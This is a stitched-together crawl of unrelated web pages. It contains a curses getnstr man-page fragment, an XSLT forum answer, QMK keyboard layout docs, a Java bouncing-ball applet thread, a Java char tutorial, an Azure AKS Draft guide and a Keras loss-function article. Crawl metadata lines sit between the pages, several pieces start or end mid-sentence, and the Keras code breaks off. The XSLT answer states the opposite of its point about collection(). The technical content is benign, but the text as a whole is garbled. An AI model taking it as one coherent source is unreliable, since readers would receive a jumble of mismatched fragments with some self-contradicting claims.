mvwgetnstr() function is identical to getnstr() except it is as though a call to wmove() is made and then a series of calls to wgetch(). The getnstr(), wgetnstr(), mvgetnstr() and mvwgetnstr() functions will only return the entire multi-byte sequence associated with a character. If the array is large enough to contain at least one character, the functions fill the array with complete characters. If the array is not large enough to contain any complete characters, the function fails. Upon successful completion, these functions return OK. Otherwise, they return ERR. No errors are defined. Reading a line that overflows the array pointed to by str with getstr(), mvgetstr(), mvwgetstr() or wgetstr() causes undefined results. The use of getnstr(), mvgetnstr(), mvwgetnstr() or wgetnstr(), respectively, is recommended. Input Processing, beep(), getch(), <curses.h>.
http://pubs.opengroup.org/onlinepubs/007908799/xcurses/mvgetstr.html
crawl-003
refinedweb
390
68.4
g tsuji wrote:First a preliminary note to clear some possible mis-interpretation: collection() is an xslt 2.0 xpath function. Now collection() can be considered as a high-octane version of doc() or document(). With its high-performance, come with its restriction. It can be used to collect sequence of non-xml url as it expects to work with the parsing. Any ill-formedness will result in fatal error. In order to collect an enumerated list of non-xml text file (like .ini containing name/value pairs or even csv or else...) you have to fall back to using doc() or document(). To make the most analog to the use of catalog (xml) in some implementation used with collection(), you can construct some apparently same catalog xml document and load it with doc() or document(). And then feed the href to some user-defined xsl function (or named template) designed for the specific purpose of parsing it. For instance, let us make a catalog, say catalog.xml, of the form like this. <collection> <doc href="abc.ini" /> <doc href="def.ini" /> <doc href="xyz.ini" /> </collection> You could process the enumerated list of external files like this. (<doc>...</doc> wrapper is just for illustration of no generic necessity; and fn is some arbitrary namespace for user-defined xslt function main().) <!-- namespace prefix fn defined in the root xsl:stylesheet --> <xsl:for-each <doc> <xsl:sequence </doc> </xsl:for-each> With the function fn:main() looking possibly like this. (I make maximum continuity of op's previous thread to make the idea of maximum clarity.) <xsl:function <xsl:param <xsl:variable <config> <!-- etc etc... --> </config> </xsl:function> Then the collection will be loaded and parsed into the particular form desired for the authoring of the resultant xml.
http://www.coderanch.com/t/537575/XML/list-xml-files
CC-MAIN-2014-41
refinedweb
297
59.19
Hi, I found this simple code. I am new to threads and i want to know how this code can be modified so that 5balls can be created and bounced off the boundaries. Will that require multiple threads - one for each ball? Do help me with this. I have been on this since yesterday! Code : import java.applet.Applet; import java.awt.Color; import java.awt.Graphics; import java.awt.Rectangle; /** An applet that displays a simple animation */ public class BouncingCircle extends Applet implements Runnable { int x = 150, y = 50, r = 50; // Position and radius of the circle int dx = 11, dy = 7; // Trajectory of circle Thread animator; // The thread that performs the animation volatile boolean pleaseStop; // A flag to ask the thread to stop /** This method simply draws the circle at its current position */ public void paint(Graphics g) { g.setColor(Color.red); g.fillOval(x - r, y - r, r * 2, r * 2); } /** * This method moves (and bounces) the circle and then requests a redraw. * The animator thread calls this method periodically. */ public void animate() { // Bounce if we've hit an edge. Rectangle bounds = getBounds(); if ((x - r + dx < 0) || (x + r + dx > bounds.width)) dx = -dx; if ((y - r + dy < 0) || (y + r + dy > bounds.height)) dy = -dy; // Move the circle. x += dx; y += dy; // Ask the browser to call our paint() method to draw the circle // at its new position. repaint(); } /** * This method is from the Runnable interface. It is the body of the thread * that performs the animation. The thread itself is created and started in * the start() method. */ public void run() { while (!pleaseStop) { // Loop until we're asked to stop animate(); // Update and request redraw try { Thread.sleep(100); } // Wait 100 milliseconds catch (InterruptedException e) { } // Ignore interruptions } } /** Start animating when the browser starts the applet */ public void start() { animator = new Thread(this); // Create a thread pleaseStop = false; // Don't ask it to stop now animator.start(); // Start the thread. // The thread that called start now returns to its caller. // Meanwhile, the new animator thread has called the run() method } /** Stop animating when the browser stops the applet */ public void stop() { // Set the flag that causes the run() method to end pleaseStop = true; } } Thanks!
http://www.javaprogrammingforums.com/%20threads/9207-bouncing-balls-printingthethread.html
CC-MAIN-2016-07
refinedweb
368
74.9
In Java, char is the data type used to store characters. However, C/C++ programmers beware that the char in Java is not the same as char in C/C++. In C/C++, char is 8 bits wide. This is not the case in Java. Instead, Java uses Unicode to represent characters. Unicode defines a entirely international character set that can represent all of the characters found in all human languages. It's a unification of dozens of character sets, such as Latin, Arabic, Greek, Hebrew, Cyrillic, and many more. At the time of Java's creation, Unicode required 16 bits. Thus, in Java char is a 16-bit type. The range of a char is from 0 to 65,536 range. There are no negative chars. The standard set of characters known as ASCII still ranges from 0 to 127 as always, and the covered 8-bit character set, ISO-Latin-1, ranges from 0 to 255. Since Java is designed to allow programs to be written for worldwide use, this makes the sense that it would use Unicode to represent the characters. Of course, the use of Unicode is slightly inefficient for languages such as English, Spanish, German, or French, whose characters can easily be controlled within 8 bits. But such is the price that must be paid for global portability. Below is a program that demonstrates the char variables : /* Java Program Example - Java Characters * This program demonstrates char data type */ public class JavaProgram { public static void main(String args[]) { char ch1, ch2; ch1 = 88; // code for X ch2 = 'Y'; System.out.print("ch1 : " + ch1 + "\nch2 : " + ch2); } } When the above Java program is compile and run, it will produce the following output: Notice here that variable ch1 is assigned the value 88, which is the ASCII (and Unicode) value that corresponds to the letter X. As discussed, the ASCII character set occupies the first 127 values in the Unicode character set. For this cause, all the older tricks that you may have used with characters in other languages will work in Java, also. Even though char is designed to hold the Unicode characters, it can also be used as an integer type on which you can perform the arithmetic operations. For instance, you can add two characters together, or increment the value of a character variable. Consider the below example program : /* Java Program Example - Java Characters * char variables behaves like integers */ public class JavaProgram { public static void main(String args[]) { char ch1; ch1 = 'X'; System.out.println("ch1 contains " +ch1); ch1++; // increments ch1 System.out.println("ch1 is now " + ch1); } } When the above Java program is compile and run, it will produce the following output: In the above program, ch1 is first given the value X. Next, ch1 is incremented. This results in ch1 holding Y, the next character in the ASCII (and Unicode) sequence. A character preceded by the backslash (\) is an escape sequence and has particular meaning to the compiler. As you see, the newline character (\n) has been used frequently in System.out.println() statements to advance to the next line after the string is printed. Look at the table given here, which shows the Java's escape sequences: When an escape sequence is encountered in a print statement, the compiler interprets it consequently. Let's look at the following example: If you want to put quotes within quotes then you must use the escape sequence, \", on the interior quotes: /* Java Program Example - Java Characters */ class JavaProgram { public static void main(String args[]) { System.out.println("He said \"Hello!\" to me."); } } It will produce the following result: Here are some examples related to characters, that you can go for. Java Programming Online Test Tools Calculator Quick Links
https://codescracker.com/java/java-characters.htm
CC-MAIN-2017-39
refinedweb
622
62.27
The layouts/ folder contains different physical key layouts that can apply to different keyboards. layouts/+ default/| + 60_ansi/| | + readme.md| | + layout.json| | + a_good_keymap/| | | + keymap.c| | | + readme.md| | | + config.h| | | + rules.mk| | + <keymap folder>/| | + ...| + <layout folder>/+ community/| + <layout folder>/| + ... The layouts/default/ and layouts/community/ are two examples of layout "repositories" - currently default will contain all of the information concerning the layout, and one default keymap named default_<layout>, for users to use as a reference. community contains all of the community keymaps, with the eventual goal of being split-off into a separate repo for users to clone into layouts/. QMK searches through all folders in layouts/, so it's possible to have multiple repositories here. Each layout folder is named ( [a-z0-9_]) after the physical aspects of the layout, in the most generic way possible, and contains a readme.md with the layout to be defined by the keyboard: # 60_ansiLAYOUT_60_ansi New names should try to stick to the standards set by existing layouts, and can be discussed in the PR/Issue. For a keyboard to support a layout, the variable must be defined in it's <keyboard>.h, and match the number of arguments/keys (and preferably the physical layout): #define LAYOUT_60_ansi KEYMAP_ANSI The name of the layout must match this regex: [a-z0-9_]+ The folder name must be added to the keyboard's rules.mk: LAYOUTS = 60_ansi LAYOUTS can be set in any keyboard folder level's rules.mk: LAYOUTS = 60_iso but the LAYOUT_<layout> variable must be defined in <folder>.h as well. You should be able to build the keyboard keymap with a command in this format: make <keyboard>:<layout> When a keyboard supports multiple layout options, LAYOUTS = ortho_4x4 ortho_4x12 And a layout exists for both options, layouts/+ community/| + ortho_4x4/| | + <layout>/| | | + ...| + ortho_4x12/| | + <layout>/| | | + ...| + ... The FORCE_LAYOUT argument can be used to specify which layout to build make <keyboard>:<layout> FORCE_LAYOUT=ortho_4x4make <keyboard>:<layout> FORCE_LAYOUT=ortho_4x12 Instead of using #include "planck.h", you can use this line to include whatever <keyboard>.h ( <folder>.h should not be included here) file that is being compiled: #include QMK_KEYBOARD_H If you want to keep some keyboard-specific code, you can use these variables to escape it with an #ifdef statement: KEYBOARD_<folder1>_<folder2> For example: #ifdef KEYBOARD_planck#ifdef KEYBOARD_planck_rev4planck_rev4_function();#endif#endif Note that the names are lowercase and match the folder/file names for the keyboard/revision exactly. In order to support both split and non-split keyboards with the same layout, you need to use the keyboard agnostic LAYOUT_<layout name> macro in your keymap. For instance, in order for a Let's Split and Planck to share the same layout file, you need to use LAYOUT_ortho_4x12 instead of LAYOUT_planck_grid or just {} for a C array.
https://beta.docs.qmk.fm/developing-qmk/qmk-reference/feature_layouts
CC-MAIN-2020-16
refinedweb
458
51.58
Details Description Implements and replaces Activity @Dinesh, I'm reopening this ticket to also log an issue when using classes located in 'sun.*' packages. Could you also replace double quotes by simple quotes in rule title ? Thanks Done! Manually tested ! Why do you exclude classes located in 'com.sun.*' ? We are using Jersey and the new rule detects all classes as issues but they are not... (com.sun.jersey.api.client.WebResource) Here is the full description J. Bernard : Classes in <code>com.sun.</code> and <code>sun.</code> packages are considered implementation details, and are not part of the Java API. They can cause problems when moving to new versions of Java because there is no backwards compatibility guarantee. Such classes are almost always wrapped by Java API classes that should be used instead. The following code snippet illustrates this rule: import com.sun.jna.Native; // Non-Compliant If this rule doesn't make sense in your context, you just have to deactivate it. Done
http://jira.codehaus.org/browse/SONARJAVA-281
CC-MAIN-2014-35
refinedweb
166
50.43
Use Draft with Azure Kubernetes Service (AKS) Draft is an open-source tool that helps package and deploy application containers in a Kubernetes cluster, leaving you free to concentrate on the dev cycle - the "inner loop" of concentrated development. Draft works as the code is being developed, but before committing to version control. With Draft, you can quickly redeploy an application to Kubernetes as code changes occur. For more information on Draft, see the Draft documentation on Github. This article shows you how to use Draft with a Kubernetes cluster on AKS. Prerequisites The steps detailed in this article assume that you have created an AKS cluster and have established a kubectl connection with the cluster. If you need these items, see the AKS quickstart. You need a private Docker registry in Azure Container Registry (ACR). For steps on how to create an ACR instance, see the Azure Container Registry quickstart. Helm must also be installed in your AKS cluster. For more information on how to install and configure Helm, see Use Helm with Azure Kubernetes Service (AKS). Finally, you must install Docker. Install Draft The Draft CLI is a client that runs on your development system and allows you to deploy code into a Kubernetes cluster. To install the Draft CLI on a Mac, use brew. For additional installation options, see the Draft Install guide. Note If you installed Draft prior to version 0.12, first delete Draft from your cluster using helm delete --purge draft and then remove your local configuration by running rm -rf ~/.draft. If you are on MacOS, then run brew upgrade draft. brew tap azure/draft brew install draft Now initialize Draft with the draft init command: draft init Configure Draft Draft builds the container images locally, and then either deploys them from the local registry (such as with Minikube), or uses an image registry that you specify. This article uses Azure Container Registry (ACR), so you must establish a trust relationship between your AKS cluster and the ACR registry, then configure Draft to push your container images to ACR. Create trust between AKS cluster and ACR To establish trust between an AKS cluster and an ACR registry, grant permissions for the Azure Active Directory service principal used by the AKS cluster to access the ACR registry. In the following commands, provide your own <resourceGroupName>, replace <aksName> with name of your AKS cluster, and replace <acrName> with the name of your ACR registry: # Get the service principal ID of your AKS cluster AKS_SP_ID=$(az aks show --resource-group <resourceGroupName> --name <aksName> --query "servicePrincipalProfile.clientId" -o tsv) # Get the resource ID of your ACR instance ACR_RESOURCE_ID=$(az acr show --resource-group <resourceGroupName> --name <acrName> --query "id" -o tsv) # Create a role assignment for your AKS cluster to access the ACR instance az role assignment create --assignee $AKS_SP_ID --scope $ACR_RESOURCE_ID --role contributor For more information on these steps to access ACR, see authenticating with ACR. Configure Draft to push to and deploy from ACR Now that there is a trust relationship between AKS and ACR, enable the use of ACR from your AKS cluster. Set the Draft configuration registry value. In the following commands, replace <acrName>with the name of your ACR registry: draft config set registry <acrName>.azurecr.io Log on to the ACR registry with az acr login: az acr login --name <acrName> As a trust was created between AKS and ACR, no passwords or secrets are required to push to or pull from the ACR registry. Authentication happens at the Azure Resource Manager level, using Azure Active Directory. Run an application To see Draft in action, let's deploy a sample application from the Draft repository. First, clone the repo: git clone Change to the Java examples directory: cd draft/examples/example-java/ Use the draft create command to start the process. This command creates the artifacts that are used to run the application in a Kubernetes cluster. These items include a Dockerfile, a Helm chart, and a draft.toml file, which is the Draft configuration file. $ draft create --> Draft detected Java (92.205567%) --> Ready to sail To run the sample application in your AKS cluster, use the draft up command. This command builds the Dockerfile to create a container image, pushes the image to ACR, and finally installs the Helm chart to start the application in AKS. The first time this command is run, pushing and pulling the container image may take some time. Once the base layers are cached, the time taken to deploy the application is dramatically reduced. $ draft up Draft Up Started: 'example-java': 01CMZAR1F4T1TJZ8SWJQ70HCNH example-java: Building Docker Image: SUCCESS ⚓ (73.0720s) example-java: Pushing Docker Image: SUCCESS ⚓ (19.5727s) example-java: Releasing Application: SUCCESS ⚓ (4.6979s) Inspect the logs with `draft logs 01CMZAR1F4T1TJZ8SWJQ70HCNH` If you encounter issues pushing the Docker image, ensure that you have successfully logged in to your ACR registry with az acr login, then try the draft up command again. Test the application locally To test the application, use the draft connect command. This command proxies a secure connection to the Kubernetes pod. When complete, the application can be accessed on the provided URL. Note It may take a few minutes for the container image to be downloaded and the application to start. If you receive an error when accessing the application, retry the connection. $ draft connect Connect to java:4567 on localhost:49804 [java]: SLF4J: Failed to load class "org.slf4j.impl.StaticLoggerBinder". [java]: SLF4J: Defaulting to no-operation (NOP) logger implementation [java]: SLF4J: See for further details. [java]: == Spark has ignited ... [java]: >> Listening on 0.0.0.0:4567 To access your application, open a web browser to the address and port specified in the draft connect output, such as. Use Control+C to stop the proxy connection. Note You can also use the draft up --auto-connect command to build and deploy your application then immediately connect to the first running container. Access the application on the internet The previous step created a proxy connection to the application pod in your AKS cluster. As you develop and test your application, you may want to make the application available on the internet. To expose an application on the internet, you create a Kubernetes service with a type of LoadBalancer, or create an ingress controller. Let's create a LoadBalancer service. First, update the values.yaml Draft pack to specify that a service with a type LoadBalancer should be created: vi charts/java/values.yaml Locate the service.type property and update the value from ClusterIP to LoadBalancer, as shown in the following condensed example: [...] service: name: java type: LoadBalancer externalPort: 80 internalPort: 4567 [...] Save and close the file, then use draft up to rerun the application: draft up It takes a few minutes for the service to return a public IP address. To monitor the progress, use the kubectl get service command with the watch parameter: kubectl get service --watch Initially, the EXTERNAL-IP for the service appears as pending: NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE example-java-java LoadBalancer 10.0.141.72 <pending> 80:32150/TCP 2m Once the EXTERNAL-IP address has changed from pending to an IP address, use Control+C to stop the kubectl watch process: NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE example-java-java LoadBalancer 10.0.141.72 52.175.224.118 80:32150/TCP 7m To see the application, browse to the external IP address of your load balancer with curl: $ curl 52.175.224.118 Hello World, I'm Java Iterate on the application Now that Draft has been configured and the application is running in Kubernetes, you are set for code iteration. Each time you want to test updated code, run the draft up command to update the running application. In this example, update the Java sample application to change the display text. Open the Hello.java file: vi src/main/java/helloworld/Hello.java Update the output text to display, Hello World, I'm Java in AKS!: package helloworld; import static spark.Spark.*; public class Hello { public static void main(String[] args) { get("/", (req, res) -> "Hello World, I'm Java in AKS!"); } } Run the draft up command to redeploy the application: $ draft up Draft Up Started: 'example-java': 01CMZC9RF0TZT7XPWGFCJE15X4 example-java: Building Docker Image: SUCCESS ⚓ (25.0202s) example-java: Pushing Docker Image: SUCCESS ⚓ (7.1457s) example-java: Releasing Application: SUCCESS ⚓ (3.5773s) Inspect the logs with `draft logs 01CMZC9RF0TZT7XPWGFCJE15X4` To see the updated application, curl the IP address of your load balancer again: $ curl 52.175.224.118 Hello World, I'm Java in AKS! Next steps For more information about using Draft, see the Draft documentation on GitHub.
https://docs.microsoft.com/en-us/azure/aks/kubernetes-draft
CC-MAIN-2018-51
refinedweb
1,454
54.42
In this starter lab, you will create your first implementation of a data structure from the Java Collections Framework. You will also learn how to use Generics and get some practice writing test cases for you program. The purpose of this lab is to: If you've not done so, I suggest you do Lab 0 first. You'll be constructing your very own implementation of the ArrayList data structure so that you understand its inner workings. You should use the prefix "My" in your class names so that you don't accidentally use the standard ArrayList in your testing. However, you will be matching its behaviour, so when in doubt, you can refer back to the ArrayList documentation for clarification and/or use an ArrayList as a working reference solution. Your MyArrayList class will implement the Java List interface. That is, you will need). You'll be using generics for your implementation, and taking advantage of the fact that List and AbstractList are similarly parameterized. Just declare your class like the following: public class MyArrayList<AnyType> extends AbstractList<AnyType> AbstractList gives you all methods except for get(int index) and size(), however, you'll need to override many other methods to get your ArrayList in fighting form. You should be using Javadoc style comments in your programs. You can use the following command to generate the Javadoc comments when you are done with your assignment. However, please delete them before submitting your assignment. % javadoc -d docs -link *.java As you might expect, the backing storage for an ArrayList is an array. That is, an ArrayList is really just an array with the extra functionality of dynamic resizing. The MyArrayList's array will not always be full because an ArrayList may change its size when the underlying array does not; therefore, your class will need to keep track of the number of items that are currently in the underlying array according to the ArrayList (which will at most times be different than the capacity/length of the array). Also, you need to keep the data in the array packed to the front so there are no gaps. Add the following members to your MyArrayList class. Implement the following constructors in your MyArrayList class. You may get a compiler warning about allocating an array of a generic type. This can be solved by using casting and a special marker in the source code to suppress the warning. Allocate in a manner similar to: AnyType[] someArray=(AnyType [])new Object[numElements]; and have a line @SuppressWarnings("unchecked") between your JavaDoc comments and the method header. This doesn't remove the warning in 1.5, but does in 1.6, and it will get rid of the error message in Eclipse. You will need to implement a private resize method that doubles the size of the array (do not just increase its length by one. Hopefully you saw on the prelab how inefficent that is!) by creating a new array of twice the current size, copying the data over, then resetting the data pointer to point to the new array. Feel free to write more private methods as you see fit. Implement the following methods in your MyArrayList class throw new IndexOutOfBoundsException();or even better: throw new IndexOutOfBoundsException("Index Out of Bounds! You tried to get " + index + " but the size is " + size );. Or something to that effect.) When the array is full, and a user tries to add something in, you should double the size of the array (rather than just increase the size by one), copy the old array into the new array, and add the new element. You'll need to copy the previous items into the same slots in the new array. You should probably have a private method for this array resizing. I'd suggest printing yourself a message when it is called at first indicating what size it is and what size it becomes. Just be sure to remove it after doing some testing. Also, take advantage of your existing methods and don't duplicate logic. You've got two constructors and two add() methods. Only one needs to do the real work, the second should just figure out a way to call the first. You should include a meaningful message when you construct the IndexOutOfBoundsException. (For example, when Java's ArrayList throws an IndexOutOfBounds exception, it tells you which index was accessed and the size of the arraylist. This seems like good information.) We now interrupt this lab to bring you an important message about testing. The programs you will write in this course get increasingly complex, and increasingly difficult to debug. We want to strongly encourage you to get into good testing habits now, right off the bat. Many of you have survived thus far by writing allll your code for a lab in one feel swoop and then testing (if that) as an afterthought at the end. Some of you are even strangely proud of this fact. This is no longer a feasible approach. Your life will be much simpler if you "write a bit, test a bit". So before you proceed to the rest of your MyArrayList implementation, you will test the code you have written thus far, using a fancy Java testing framework called JUnit. As a side note, some people take this to the extreme,: The JUnit framework addresses these issues, and more. JUnit is a widely-used API that enables developers to easily create Java test cases. It provides a comprehensive assertion facility to verify expected versus actual results. It is simple to write a JUnit test case, especially in eclipse: MyArrayList<Integer> test = new MyArrayList<Integer>(); ArrayList<Integer> real = new ArrayList<Integer>(); assertEquals("Size after construction", real.size(), test.size());Basically, we construct an arraylist with our implementation, and compare it to that of Java's. Ideally the size of our new arraylist is 0, which should be real.size() anyway.). How useful is that! Change it back. MyArrayList<Integer> test = new MyArrayList<Integer>(); ArrayList<Integer> real = new ArrayList<Integer>(); assertEquals( "Size after construction", real.size(), test.size()); test.add(0,5); real.add(0,5); assertEquals( "Size after add", real.size(), test.size()); @Test(expected=IndexOutOfBoundsException.class) public void testForAddLeftException() throws Exception { MyArrayList<Integer> test = new MyArrayList<Integer>(); test.add(-1, 5); }To test the exception that should be thrown by the add method when adding "off the right" of the list, we would use a second method: @Test(expected=IndexOutOfBoundsException.class) public void testForAddRightException() throws Exception { MyArrayList<Integer> test = new MyArrayList<Integer>(); test.add(test.size()+1, 5); } Now let's have you try. In each of the following test methods, implement the recommended test. Read Strings from the file test1.txt, creating a MyArrayList of Strings (and probably also an ArrayList of the same strings) by inserting each line of the file, one at a time, into a MyArrayList<String> using the add(element) method. Then loop through your two lists element-by-element and assert that the ith element should be equal for each i. If you are doing this from eclipse in the lab (and maybe at home), you may have to specify the entire path of the file, not just the relative path. It seems as though eclipse is being run from some mystery location, so this is how it must be done! Again, read Strings from test1.txt, but insert each line at the front of the list using add(index, element). Add on to the end of the previous test by reconstructing your two arrays. Perform the same steps, but insert each line at the midpoint (size/2) of the list. There you go, your very first JUnit tests! As you implement the rest of your arraylist methods, please write the accompanying JUnit test, and add to any previous ones. Now spend some time finishing up your implementation of your MyArrayList class. Don't forget to write (and run!) your tests as you go along. Implement the following methods in your MyArrayList class awhile README file, and submit it with your lab. 1 # file/directory is lab1 % lshand # should show that you've handed in something You can also specify the options to handin from the command line % cd ~/cs151 # goes to your cs151 folder % handin -c 151 -a 1 lab1 % lshand # should show that you've handed in something
http://www.cs.oberlin.edu/~asharp/cs151/labs/lab01/lab01.html
CC-MAIN-2018-51
refinedweb
1,397
63.8
Just another Data Offline Generator Project description Just another Data Offline Generator (JDOG) 🐶 🗎 Full documentation. - JDOG is a Python library which helps generate a sample data for your projects. - JDOG can also be run as CLI tool. - For generating a sample data, the data scheme is provided. Scheme - The scheme is provided in JSON format with special placeholders. - In the output, the placeholders are replaced with some generated data. Any valid JSON is valid scheme. How to use it? Install it python -m pip install jdog Prepare a scheme { "{{range(people,4)}}": { "name": "{{name}}", "age": "{{age}}", "address": { "city": "{{city}}" }, "car": "{{option(mustang,{{empty}})}}" } } Use it from jdog import Jdog def main(): jdog = Jdog() scheme = ... # your loaded scheme # parse scheme jdog.parse_scheme(scheme) # generate instance result = jdog.generate() print(result) # result is JSON And the example result: { "people": [ { "name": "Brandi Young", "age": 39, "address": { "city": "Jamietown" }, "car": "mustang" }, { "name": "Michelle Best", "age": 70, "address": { "city": "Port Dustin" }, "car": "" }, { "name": "Donald Hernandez", "age": 79, "address": { "city": "East Julieshire" }, "car": "mustang" }, { "name": "Kaitlyn Cook", "age": 3, "address": { "city": "Rachelton" }, "car": "mustang" } ] } CLI Package can be used as cli tool. Usage: jdog [OPTIONS] SCHEME Accepts SCHEME and generates new data to stdin or to specified OUTPUT Options: -p, --pretty Output as pretty JSON. -s, --strict Raise error when no matching placeholder is found. -l, --lang TEXT Language to use. --lang-help Displays available language codes and exit. -o, --output FILENAME Output file where result is written. --help Show this message and exit. By default, CLI tool does not save output to file, just print results to standard output. 👍 JDOG is using awesome package Faker which is used to generate random data. Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/jdog/
CC-MAIN-2021-04
refinedweb
306
66.23
In this article, there is an in-depth discussion on - What are Loss Functions - What are Evaluation Metrics? - Commonly used Loss functions in Keras (Regression and Classification) - Built-in loss functions in Keras - What is the custom loss function? - Implementation of common loss functions in Keras - Custom Loss Function for Layers i.e Custom Regularization Loss - Dealing with NaN values in Keras Loss - Why should you use a Custom Loss? - Monitoring Keras Loss using callbacks What are Loss Functions Loss functions are one of the core parts of a machine learning model. If you’ve been in the field of data science for some time, you must have heard it. Loss functions, also known as cost functions, are special types of functions, which help us minimize the error, and reach as close as possible to the expected output. In deep learning, the loss is computed to get the gradients for the model weights and update those weights accordingly using backpropagation. Source: FreeCodeCamp Basic working or understanding of error can be gained from the image above, where there is an actual value and a predicted value. The difference between the actual value and predicted value can be known as error. This can be written in the equation form as So our goal is to minimize the difference between the predicted value which is hθ(x) and the actual value y. In other words, you have to minimize the value of the cost function. This main idea can be understood better from the following picture by Professor Andrew NG where he explains that choosing the correct value of θ0 and θ1 which are weights of a model, such that our prediction hθ is closest to y which is the actual output. Here Professor Andrew NG is using the Mean Squared Error function, which will be discussed later on. An easy explanation can be said that the goal of a machine learning model is to minimize the cost and maximize the evaluation metric. This can be achieved by updating the weights of a machine learning model using some algorithm such as Gradient Descent. Here you can see the weight that is being updated and the cost function, that is used to update the weight of a machine learning model. What are Evaluation Metrics Evaluation metrics are the metrics used to evaluate and judge the performance of a machine learning model. Evaluating a machine learning project is very essential. There are different types of evaluation metrics such as ‘Mean Squared Error’, ‘Accuracy’, ‘Mean Absolute Error’ etc. The cost functions used, such as mean squared error, or binary cross-entropy are also metrics, but they are difficult to read and interpret how our model is performing. So there is a need for other metrics like Accuracy, Precision, Recall, etc. Using different metrics is important because a model may perform well using one measurement from one evaluation metric, but may perform poorly using another measurement from another evaluation metric. Here you can see the performance of our model using 2 metrics. The first one is Loss and the second one is accuracy. It can be seen that our loss function (which was cross-entropy in this example) has a value of 0.4474 which is difficult to interpret whether it is a good loss or not, but it can be seen from the accuracy that currently it has an accuracy of 80%. Hence it is important to use different evaluation metrics other than loss/cost function only to properly evaluate the model’s performance and capabilities. Some of the common evaluation metrics include: - Accuracy - Precision - Recall - F-1 Score - MSE - MAE - Confusion Matrix - Logarithmic Loss - ROC curve And many more. Commonly Used Loss Functions in Machine Learning Algorithms and their Keras Implementation Source: Heartbeat Common Regression Losses: Regression is the type of problem where you are going to predict a continuous variable. This means that our variable can be any number, not some specific labels. For example, when you have to predict prices of houses, it can be a house of any price, so it is a regression problem. Some of the common examples of regressions tasks are - Prices Prediction - Stock Market Prediction - Financial Forecasting - Trend Analysis - Time Series Predictions And many more. This figure above explains the regression problem where you are going to predict the price of the house by checking three features which are size of the house, rooms in the house, and baths in the house. Our model will check these features, and will predict a continuous number that will be the price of the house. Since regression problems deal with predicting a continuous number, so you have to use different types of loss then classification problems. Some of the commonly used loss functions in regression problems are as follows. Mean Squared Error Mean squared error, also known as L2 Loss is mainly used for Regression Tasks. As the name suggests, it is calculated by taking the mean of the square of the loss/error which is the difference between actual and predicted value. The Mathematical equation for Mean Squared Error is Where Ŷi is the predicted value, and Yi is the actual value. Mean Squared Error penalizes the model for making errors by taking the square. This is the reason that this loss function is less robust to outliers in the dataset. Implementation in Keras. Standalone Usage: import keras import numpy as np y_true = np.array([[10.0,7.0]]) #sample data y_pred = np.array([[8.0, 6.0]]) a = keras.losses.MSE(y_true, y_pred) print(f'Value of Mean Squared Error is {a.numpy()}') Here predicted values and the true values are passed inside the Mean Squared Error Object from keras.losses and computed the loss. It returns a tf.Tensor object which has been converted into numpy to see more clearly. Using via compile Method: Keras losses can be specified for a deep learning model using the compile method from keras.Model.. model = keras.Sequential([ keras.layers.Dense(10, input_shape=(1,), activation='relu'), keras.layers.Dense(1) ]) And now the compile method can be used to specify the loss and metrics. model.compile(loss='mse', optimizer='adam') Now when our model is going to be trained, it will use the Mean Squared Error loss function to compute the loss, update the weights using ADAM optimizer. model.fit(np.array([[10.0],[20.0], [30.0],[40.0],[50.0],[60.0],[10.0], [20.0]]), np.array([6, 12, 18,24,30, 36,6, 12]), epochs=10) Mean Absolute Error Mean Absolute error, also known as L1 Error, is defined as the average of the absolute differences between the actual value and the predicted value. This is the average of the absolute difference between the predicted and the actual value. Mathematically, it can be shown as: The Mean Absolute error uses the scale-dependent accuracy measure which means that it uses the same scale which is being used by the data being measured, thus it can not be used in making comparisons between series that are using different scales. Mean Squared Error is also a common regression loss, which means that it is used to predict a continuous variable. Standalone Implementation in Keras: import keras import numpy as np y_true = np.array([[10.0,7.0]]) #dummy data y_pred = np.array([[8.0, 6.0]]) c = keras.losses.MAE(y_true, y_pred) #calculating loss print(f'Value of Mean Absolute Error is {c.numpy()}') What you have to do is to create an MAE object from keras.losses and pass in our true and predicted labels to calculate the loss using the equation given above. Implementing using compile method When working with a deep learning model in Keras, you have to define the model structure first. model = keras.models.Sequential([ keras.layers.Dense(10, input_shape=(1,), activation='relu'), keras.layers.Dense(1) ]) After defining the model architecture, you have to compile it and use the MAE loss function. Notice that either there is linear or no activation function in the last layer means that you are going to predict a continuous variable. model.compile(loss='mae', optimizer='adam') You can now simply just fit the model to check our model’s progress. Here our model is going to train on a very small dummy random array just to check the progress. model.fit(np.array([[10.0],[20.0], [30.0],[40.0],[50.0],[60.0],[10.0], [20.0]]), np.array([6, 12, 18,24,30, 36,6, 12]), epochs=10) And you can see the loss value which has been calculated using the MAE formula for each epoch. Common Classification Losses: Classification problems are those problems, in which you have to predict a label. This means that the output should be only from the given labels that you have provided to the model. For example: There is a problem where you have to detect if the input image belongs to any given class such as dog, cat, or horse. The model will predict 3 numbers ranging from 0 to 1 and the one with the highest probability will be picked If you want to predict whether it is going to rain tomorrow or not, this means that the model can output between 0 and 1, and you will choose the option of rain if it is greater than 0.5, and no rain if it is less than 0.5. Common Classification Loss: 1. Cross-Entropy Cross Entropy is one of the most commonly used classification loss functions. You can say that it is the measure of the degrees of the dissimilarity between two probabilistic distributions. For example, in the task of predicting whether it will rain tomorrow or not, there are two distributions, one for True, and one for False. Cross Entropy is of 3 main types. a. Binary Cross Entropy Binary Cross Entropy, as the name suggests, is the cross entropy that occurs between two classes, or in the problem of binary classification where you have to detect whether it belongs to class ‘A’, and if it does not belong to class ‘A’, then it belongs to class ‘B’. Just like in the example of rain prediction, if it is going to rain tomorrow, then it belongs to rain class, and if there is less probability of rain tomorrow, then this means that it belongs to no rain class. Mathematical Equation for Binary Cross Entropy is This loss function has 2 parts. If our actual label is 1, the equation after ‘+’ becomes 0 because 1-1 = 0. So loss when our label is 1 is And when our label is 0, then the first part becomes 0. So our loss in that case would be This loss function is also known as the Log Loss function, because of the logarithm of the loss. Standalone Implementation: You can create an object for Binary Cross Entropy from Keras.losses. Then you have to pass in our true and predicted labels. import keras import numpy as np y_true=np.array([[1.0]]) y_pred = np.array([[0.9]]) loss = keras.losses.BinaryCrossentropy() print(f"BCE LOSS VALUE IS {loss(y_true, y_pred).numpy()}") Implementation using compile method To use Binary Cross Entropy in a deep learning model, design the architecture, and compile the model while specifying the loss as Binary Cross Entropy. import keras import numpy as np model = keras.models.Sequential([ keras.layers.Dense(16, input_shape=(2,), activation='relu'), keras.layers.Dense(8, activation='relu'), 